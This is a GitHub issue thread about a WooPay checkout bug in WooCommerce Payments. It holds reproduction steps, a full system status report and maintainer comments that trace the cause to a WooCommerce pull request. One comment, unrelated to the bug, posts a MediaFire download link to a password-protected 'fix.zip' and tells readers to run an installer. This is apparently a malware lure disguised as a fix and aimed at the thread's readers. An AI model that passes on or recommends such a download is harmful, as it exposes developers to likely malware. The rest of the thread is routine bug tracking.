### ISSUE TITLE
[GlobalStep] "There was an error processing the order. Please go back to the merchant store and try again." error is display after clicking on the "Place Order" button on the "Woopay checkout" page.

### ISSUE THREAD

**Issue by gglobalstep** [Automattic/woocommerce-payments#9345]
### Bug Description:
"There was an error processing the order. Please go back to the merchant store and try again." error is display after clicking on the "Place Order" button on the "Woopay checkout" page.

### Environment:
Woocommerce Version: 9.3.0-beta.1
WooCommerce Payments: 8.2.0-test-1
WordPress version: v6.6.1

PC:
Windows 10
Chrome (Version 128.0.6613.85)
Firefox (Version 129.0.2)

### Steps To Reproduce:
1. Create a test site.
2. Install and activate the Woocommerce version 9.3.0-beta.1 plugins.
3. Upload and activate the WooCommerce Payments v8.2.0-test-1 plugin.
4. Complete the setup wizard.
5. Complete the KYC flow.
6. Merchant account must be US-based.
7. WooPay must be enabled at checkout (Via WooCommerce > WooPayments Settings > Express checkouts).
8. WooPay must be enabled on the product page (Via WooCommerce > WooPayments Settings > Express checkouts > WooPay > "Customize").
9. As a customer, navigate to a product page for a product (any kind of product should work: simple, variable, virtual, subscription).
10. Click "Buy with WooPay" next to the "Add to cart" CTA.
11. Customer should be redirected to the WooPay checkout page and presented with a login form. Note: If you click the button very quickly after page load you will get the OTP modal to complete the email and OTP steps and then get redirected.
12. Enter a new email address into the "sign up" email field, click "Continue".
13. Enter a valid phone number, click "verify your account".
14. Enter the OTP code you received on the phone number previously entered.
15. The full checkout form should now load.
16. Fill in the details for the shipping address, card details.
17. Click "Place order"
18. Observe that, "There was an error processing the order. Please go back to the merchant store and try again." error is display.

### Instruction Link
https://github.com/Automattic/woocommerce-payments/wiki/Testing-instructions-for-critical-flows#woopay-checkout

### Actual Result:
"There was an error processing the order. Please go back to the merchant store and try again." error is display after clicking on the "Place Order" button on the "Woopay checkout" page.

### Expected Result:
Order should be placed after clicking on the "Place Order" button on the "Woopay checkout" page.

### Screenshot:

![#9345](https://github.com/user-attachments/assets/ca4c77ab-a092-4609-b438-10cc8ec03591)

*Isolating the problem (mark completed items with an [x]):*
- [ ] I have deactivated other plugins and confirmed this bug occurs when only WooCommerce plugin is active.
- [ ] This bug happens with a default WordPress theme active, or [Storefront](https://woocommerce.com/storefront/).
- [X] I can reproduce this bug consistently using the steps above.

<details><summary>System Status Report</summary>

```
### WordPress Environment ###

WordPress address (URL): [Redacted]
Site address (URL): [Redacted]
WC Version: 9.3.0-beta.1
Legacy REST API Package Version: The Legacy REST API plugin is not installed on this site.
Action Scheduler Version: ✔ 3.8.1
Log Directory Writable: ✔
WP Version: 6.6.1
WP Multisite: –
WP Memory Limit: 512 MB
WP Debug Mode: –
WP Cron: ✔
Language: en_US
External object cache: ✔

### Server Environment ###

Server Info: nginx
PHP Version: 8.1.29
PHP Post Max Size: 2 GB
PHP Time Limit: 1200
PHP Max Input Vars: 6144
cURL Version: 8.7.1
OpenSSL/3.0.11

SUHOSIN Installed: –
MySQL Version: 10.6.18-MariaDB-log
Max Upload Size: 2 GB
Default Timezone is UTC: ✔
fsockopen/cURL: ✔
SoapClient: ✔
DOMDocument: ✔
GZip: ✔
Multibyte String: ✔
Remote Post: ✔
Remote Get: ✔

### Database ###

[REDACTED]

### Post Type Counts ###

attachment: 24
page: 8
post: 2
product: 18
product_variation: 7
revision: 5
shop_order_placehold: 9
wp_global_styles: 1
wp_navigation: 1

### Security ###

Secure connection (HTTPS): ✔
Hide errors from visitors: ✔

### Active Plugins (5) ###

Query Monitor: by John Blackbourn – 3.16.4
Akismet Anti-spam: Spam Protection: by Automattic - Anti-spam Team – 5.3.3
WooCommerce Payments Dev Tools: by Automattic –
WooPayments: by WooCommerce – 8.0.2
WooCommerce: by Automattic – 9.3.0-beta.1

### Inactive Plugins (0) ###


### Dropin Plugins () ###

advanced-cache.php: advanced-cache.php
db.php: Query Monitor Database Class (Drop-in)
object-cache.php: Memcached

### Must Use Plugins (1) ###

load.php: by  –

### Settings ###

Legacy API Enabled: –
Force SSL: –
Currency: USD ($)
Currency Position: left
Thousand Separator: ,
Decimal Separator: .
Number of Decimals: 2
Taxonomies: Product Types: external (external)
grouped (grouped)
simple (simple)
variable (variable)

Taxonomies: Product Visibility: exclude-from-catalog (exclude-from-catalog)
exclude-from-search (exclude-from-search)
featured (featured)
outofstock (outofstock)
rated-1 (rated-1)
rated-2 (rated-2)
rated-3 (rated-3)
rated-4 (rated-4)
rated-5 (rated-5)

Connected to WooCommerce.com: –
Enforce Approved Product Download Directories: ✔
HPOS feature enabled: ✔
Order datastore: Automattic\WooCommerce\Internal\DataStores\Orders\OrdersTableDataStore
HPOS data sync enabled: –

### Logging ###

Enabled: ✔
Handler: Automattic\WooCommerce\Internal\Admin\Logging\LogHandlerFileV2
Retention period: 30 days
Level threshold: –
Log directory size: 478 KB

### WC Pages ###

Shop base: #5 - /shop/
Cart: #6 - /cart/ -  Contains the woocommerce/cart block
Checkout: #7 - /checkout/ -  Contains the woocommerce/checkout block
My account: #8 - /my-account/
Terms and conditions: ❌ Page not set

### Theme ###

Name: Storefront
Version: 4.6.0
Author URL: https://woocommerce.com/
Child Theme: ❌ – If you are modifying WooCommerce on a parent theme that you did not build personally we recommend using a child theme. See: How to create a child theme
WooCommerce Support: ✔

### Templates ###

Overrides: –

### WooPayments ###

Version: 8.0.2
Connected to WPCOM: Yes
WPCOM Blog ID: 236398002
Account ID: acct_1PsKv9Fsk9LnVKr4
Payment Gateway: Enabled
Test Mode: Enabled
Enabled APMs: card
WooPay: Enabled (product,cart,checkout)
WooPay Incompatible Extensions: No
Apple Pay / Google Pay: Enabled (product,cart,checkout)
Fraud Protection Level: basic
Multi-currency: Enabled
Auth and Capture: Enabled
Documents: Disabled
Logging: Enabled

### Admin ###

Enabled Features: activity-panels
analytics
product-block-editor
coupons
core-profiler
customize-store
customer-effort-score-tracks
import-products-task
experimental-fashion-sample-products
shipping-smart-defaults
shipping-setting-tour
homescreen
marketing
mobile-app-banner
navigation
onboarding
onboarding-tasks
pattern-toolkit-full-composability
product-custom-fields
remote-inbox-notifications
remote-free-extensions
payment-gateway-suggestions
printful
shipping-label-banner
subscriptions
store-alerts
transient-notices
woo-mobile-welcome
wc-pay-promotion
wc-pay-welcome-page
launch-your-store

Disabled Features: experimental-blocks
minified-js
product-pre-publish-modal
settings
async-product-editor-category-field
product-editor-template-system
blueprint
reactify-classic-payments-settings

Daily Cron: ✔ Next scheduled: 2024-08-28 08:23:09 +00:00
Options: ✔
Notes: 61
Onboarding: skipped

### Action Scheduler ###

Canceled: 1
Oldest: 2024-08-27 09:29:14 +0000
Newest: 2024-08-27 09:29:14 +0000

Complete: 64
Oldest: 2024-08-27 08:25:48 +0000
Newest: 2024-08-27 12:14:48 +0000

Failed: 2
Oldest: 2024-08-27 08:27:48 +0000
Newest: 2024-08-27 09:18:16 +0000

Pending: 1
Oldest: 2024-08-28 08:25:48 +0000
Newest: 2024-08-28 08:25:48 +0000


### Status report information ###

Generated at: 2024-08-27 14:39:50 +00:00
```
</details>

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/jjwb2y99al0750x/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by htdat** [comment]
For any devs working on this, here is the test site info to discover this bug p1724761128975899-slack-C011ENB20Q1

Relevant convo: p1724765247187109-slack-C022WMN88KG

**Comment by htdat** [comment]
Summary: 

- Cause: https://github.com/woocommerce/woocommerce/pull/50531
- Temporary fix: revert of the PR above https://github.com/woocommerce/woocommerce/pull/51067

I am closing this issue now. You are welcome to reopen it if necessary @alefesouza @pierorocca @c-shultz
